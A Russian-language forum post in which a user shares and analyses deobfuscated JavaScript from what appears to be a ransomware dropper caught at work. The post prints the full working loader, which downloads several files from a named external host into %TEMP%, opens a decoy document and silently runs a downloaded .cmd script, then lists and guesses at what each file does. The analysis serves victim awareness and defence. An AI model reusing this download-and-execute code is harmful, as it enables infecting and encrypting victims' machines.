Привет! У меня тоже типа того на работе словили, расшифровал обфусцированный JS в итоге ясны источники откуда все скачалось и что запускалось далее, вот реальный код JS:
function walkman(t,e){
var c=new ActiveXObject("MSXML2.XMLHTTP");
c.onreadystatechange = function(){
if(4 === c.readyState){
var t = new ActiveXObject("ADODB.Stream");
t.open(),
t.type=1,
t.write(c.ResponseBody),
t.position=0,
t.saveToFile(e,2),
t.close()
}
},
c.open("GET", t, 0),
c.send()
}
function CreateObject(t){
return new ActiveXObject(t)
}
var sunshine="attach",
costarica="%TEMP%\\",
gti="twitterkeybtc.com",
mercedes="%TEMP%\\syntax.cmd",
WshShell=WScript.CreateObject("WScript.Shell"),
proud="%TEMP%\\document.doc",
WshShell=CreateObject("WScript.Shell");
costarica=WshShell.ExpandEnvironmentStrings(costarica),
walkman("http://"+gti+"/attach/doc.keybtc",""+costarica+"document.doc");
try {
WshShell.Run(""+proud,1,0)
} catch(cont){}
walkman("http://"+gti+"/attach/night.keybtc",""+costarica+"night.keybtc"),
walkman("http://"+gti+"/attach/fake.keybtc",""+costarica+"fake.keybtc"),
walkman("http://"+gti+"/attach/trash.keybtc",""+costarica+"trash.keybtc"),
walkman("http://"+gti+"/attach/key.block",""+costarica+"syntax.cmd"),
WshShell.Run(""+mercedes,0,0);
В итоге скрипт выполнится лишь в том случае, если доступен WScript объект и скачает несколько файлов:
1.
twitterkeybtc.com/attach/doc.keybtc (содержит какие то иероглифы, макросов не обнаружил)
2.
twitterkeybtc.com/attach/night.keybtc ( НОЧЬ ; ) )
3.
twitterkeybtc.com/attach/fake.keybtc (очень похоже на утилитку для
RSA-1024 шифрования, не получилось запустить из-за отсутствующей iconv.dll (для преобразования кодировки символов), а потом желание запускать отпало =))
4.
twitterkeybtc.com/attach/trash.keybtc (трэш)
5.
twitterkeybtc.com/attach/key.block (а это то, что переименовывается в syntax.cmd и запускается. Скорее всего опять обфусцированно, т.к. содержит иероглифы, хотя странно, переводя их в гугле иногда даже есть смысл (наверное перетрудился=) ) )
Пока что все, но по предварительным результатам анализа вируса, расшифровать его будет вряд ли возможным...
